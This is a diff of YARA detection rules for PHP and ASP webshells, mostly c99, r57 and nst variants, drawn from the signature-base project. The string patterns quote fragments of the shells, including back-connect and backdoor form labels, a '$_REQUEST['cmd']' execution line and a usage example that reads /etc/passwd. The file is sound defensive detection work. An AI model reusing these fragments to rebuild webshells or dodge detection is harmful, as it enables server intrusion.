-		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
+		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
+		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Csh_Php_Php
+rule SIGNATURE_BASE__Nst_Php_Php_Img_Php_Php_Nstview_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file csh.php.php.txt"
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
+		id = "238242f5-4e57-5edb-8806-ea5e06f1f637"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4014-L4027"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4987-L5002"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
-		logic_hash = "2a74e06a9fd59d7a577041b49403738904239fb011f9bfe2fb665165991b9c98"
+		logic_hash = "b1e13f75edbbc8f9263e0e516a54330ce57190ba0b45813dad4bafeaeefa389b"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash2 = "4745d510fed4378e4b1730f56f25e569"
 
 	strings:
-		$s0 = ".::[c0derz]::. web-shell"
-		$s1 = "http://c0derz.org.ua"
-		$s2 = "vint21h@c0derz.org.ua"
-		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
+		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
+		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
+		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Phpinj_Php_Php
+rule SIGNATURE_BASE__Network_Php_Php_Xinfo_Php_Php_Nfm_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
+		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "7bf54ef4-a3d8-51c6-8db7-bf8947e992ed"
+		id = "4fd11db6-902d-5f1a-96c5-9dfcccce7488"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4028-L4040"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5003-L5017"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d7a4b0df45d34888d5a09f745e85733f"
-		logic_hash = "5d39fd31cdaae7765267ce8a35a2fdcf86e7f0de40d4f303fb0f219c0fc04e40"
+		logic_hash = "913ff19b6448d3b074440c2a5f85d85813fdf010d33dc57c89ba1e5db6455e11"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
+		hash1 = "2601b6fc1579f263d2f3960ce775df70"
+		hash2 = "401fbae5f10283051c39e640b77e4c26"
 
 	strings:
-		$s1 = "News Remote PHP Shell Injection"
-		$s3 = "Php Shell <br />" fullword
-		$s4 = "<input type = \"text\" name = \"url\" value = \""
+		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
+		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sig_2008_Php_Php
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file 2008.php.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "bfa3caa9-70a5-536b-a887-58427eee43df"
+		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4041-L4054"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5018-L5033"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3e4ba470d4c38765e4b16ed930facf2c"
-		logic_hash = "a437dc3dc836e93c7a691f7a000c4a4ae574ba95b3a216394ba42538beb9c0f7"
+		logic_hash = "a4bae5456baf0d8d894165c84d66118f2b16cfc040e299c2032eccb6a9eb4822"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s0 = "Codz by angel(4ngel)"
-		$s1 = "Web: http://www.4ngel.net"
-		$s2 = "$admin['cookielife'] = 86400;"
-		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
+		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
+		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Ak74Shell_Php_Php
+rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4055-L4067"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5034-L5051"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7f83adcb4c1111653d30c6427a94f66f"
-		logic_hash = "64eb7e72679fc9ee81af6f46d0ab604357710716b93b1ddfaebc5596c968fce8"
+		logic_hash = "0df3e00f752f85aa1f150c01e3ef41b9a5cd3d3ce2060965992320cb3c4d87ae"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "8023394542cddf8aee5dec6072ed02b5"
+		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash5 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
-		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
-		$s3 = "$xshell"
+		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
+		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Rem_View_Php_Php
+rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php_Ctt_Sh_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6137434c-89e9-537b-9b26-b56178022b76"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4068-L4080"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5052-L5068"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "29420106d9a81553ef0d1ca72b9934d9"
-		logic_hash = "bcd5c86e793748ffe0ce4415ee68101e8183e1f97477b49843938d254f08695a"
+		logic_hash = "137f98b636ec012d7d5e687f7d24ae88e8d3261360e60a4bbc03da248cce381e"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "671cad517edd254352fe7e0c7c981c39"
 
 	strings:
-		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
-		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
-		$s4 = "Welcome to phpRemoteView (RemView)"
+		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
+		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
+		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Java_Shell_Js
+rule SIGNATURE_BASE__R577_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Java Shell.js.txt"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eff52c3a-fc3a-5e80-8da9-786168159ebc"
+		id = "d287136c-534b-51a4-88fc-40ef9f22d910"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4081-L4093"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5069-L5083"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
-		logic_hash = "f312298ac30ab57b21222a529b1566b9a66909806e4bc88120ac3992cfd3c6fb"
+		logic_hash = "09892789e8dad16f9fc7c4e22525e5d0af3af401a4b2655b70f7a6856888875c"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash2 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
-		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
-		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
+		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
+		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_STNC_Php_Php
+rule SIGNATURE_BASE_Webshell_C99_Generic
 {
 	meta:
-		description = "Semi-Auto-generated  - file STNC.php.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "8a7167f6-fa62-574f-a37c-3ceadc7f92ec"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4094-L4107"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5084-L5104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
-		logic_hash = "b4118dc45ac109bde1cafda24cc103370db57c1993690f450cff828c1633af3c"
+		logic_hash = "422bc3a0d9b04b1e37ad954faacb1ec7841fe529c1eb19634bdbfe83da374c73"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+		hash6 = "671cad517edd254352fe7e0c7c981c39"
 
 	strings:
-		$s0 = "drmist.ru" fullword
-		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
-		$s2 = "STNC WebShell"
-		$s3 = "http://www.security-teams.net/index.php?showtopic="
+		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
+		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
+		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
+		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Azrailphp_V1_0_Php
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "60152b96-e8d3-5b06-a855-fb64a490742b"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4108-L4120"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5105-L5122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "26b2d3943395682e36da06ed493a3715"
-		logic_hash = "4385f294e59b644fe86d8380db4f7926924eb744ad80735b78ef778d2f7e8ae0"
+		logic_hash = "b133cf947476a1c94ed90b5cd3757ca8aa429be4284d75664625896d9cfa687f"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s0 = "azrailphp"
-		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
-		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
+		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
+		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Moroccan_Spamers_Ma_Edition_By_Ghost_Php
+rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "721d6e9f-a237-5462-a8d3-f838d7fda420"
+		id = "c01ad0e5-1aff-5128-9d0c-5d0967532a4b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4121-L4133"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5123-L5137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
-		logic_hash = "e755e4ea467861e5217d532b161bf4c582ff71aa1e4720dfa4b75d6e8d7629d8"
+		logic_hash = "7bdaebfb093b58a2fd33b4bbeea8465d0f724383b4855eb521a3e339ee153781"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s0 = ";$sd98=\"john.barker446@gmail.com\""
-		$s1 = "print \"Sending mail to $to....... \";"
-		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
+		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+		$s2 = "c99sh_sqlquery"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Zacosmall_Php
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file zacosmall.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "25946aa7-7c56-5670-ae2f-c55e65a3b911"
+		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4134-L4146"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5138-L5154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5295ee8dc2f5fd416be442548d68f7a6"
-		logic_hash = "5a2125fc447344f8cc708503d9e4dd82f9b873e40ded497ef9e01974d08bf043"
+		logic_hash = "6dbd40e19d4d5753dbd1f7e627bccc08a60430de8138a923f13e836d19dde65c"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s0 = "rand(1,99999);$sj98"
-		$s1 = "$dump_file.='`'.$rows2[0].'`"
-		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
+		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
+		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Cmdasp_Asp
+rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "79e0ba85-ed4b-5909-a2fd-9b4125598078"
+		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4147-L4160"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5155-L5171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "64f24f09ec6efaa904e2492dffc518b9"
-		logic_hash = "95dc25ecd47b43edbd7e7e36966377aa09da769aff2bc1c33a7df87989611bfa"
+		logic_hash = "834c33059e08e8075a8d3f69187b74f3b53afabfc37ae1f13a2f579f0948a363"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$s0 = "CmdAsp.asp"
-		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
-		$s2 = "-- Use a poor man's pipe ... a temp file --"
-		$s3 = "maceo @ dogmile.com"
+		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
+		$s1 = ".$arrow.\"</b>\",in('text','"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Simple_Backdoor_Php
+rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "5607f501-a750-59be-9595-5ac71ea6f74b"
+		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4161-L4173"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5172-L5187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f091d1b9274c881f8e41b2f96e6b9936"
-		logic_hash = "e2e98580b59727313de298fab0009704f621b1b6556220d5065118d960f7a068"
+		logic_hash = "f97846fdaac949185b4ce6a25cc276f4ae4243d891acb18c3a3ce0c18b540976"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
 
 	strings:
-		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
-		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
+		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
+		$s2 = "rst.void.ru"
 
 	condition:
-		2 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Mysql_Shell_Php
+rule SIGNATURE_BASE__R577_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e517984b-575c-5ead-a438-9767d2c74099"
+		id = "7a31b923-15e5-5af4-9ad0-8d261fedf7c4"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4174-L4186"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5188-L5204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d42aec2891214cace99b3eb9f3e21a63"
-		logic_hash = "dbd825e1056c41efaf80c0495ba7b6cf1c88403b997ea7ac1378512a19f7ed8a"
+		logic_hash = "764a374c1e4acec8978db1e7e7e326c4fa95c6f92e1ca5a6d7f892bb05ecd289"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "8023394542cddf8aee5dec6072ed02b5"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$s0 = "SooMin Kim"
-		$s1 = "smkim@popeye.snu.ac.kr"
-		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
+		$s0 = "echo ws(2).$lb.\" <a"
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
+		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Dive_Shell_1_0___Emperor_Hacking_Team_Php
+rule SIGNATURE_BASE__Wacking_Php_Php_1_Specialshell_99_Php_Php_C100_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d75294a4-a0a7-5c74-bb7a-766db477633c"
+		id = "3dac5550-598a-5a0f-95c3-2e0162a686ee"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4187-L4200"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5205-L5221"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1b5102bdc41a7bc439eea8f0010310a5"
-		logic_hash = "bd51b625359799178ad3c8e02ba5bb5fca89e6e14769b86dd35c2b8a1049599f"
+		logic_hash = "0d32fc00ba2602a1140dc9030894bb9524c55b95c445a08f2bf6f8fc60108e64"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
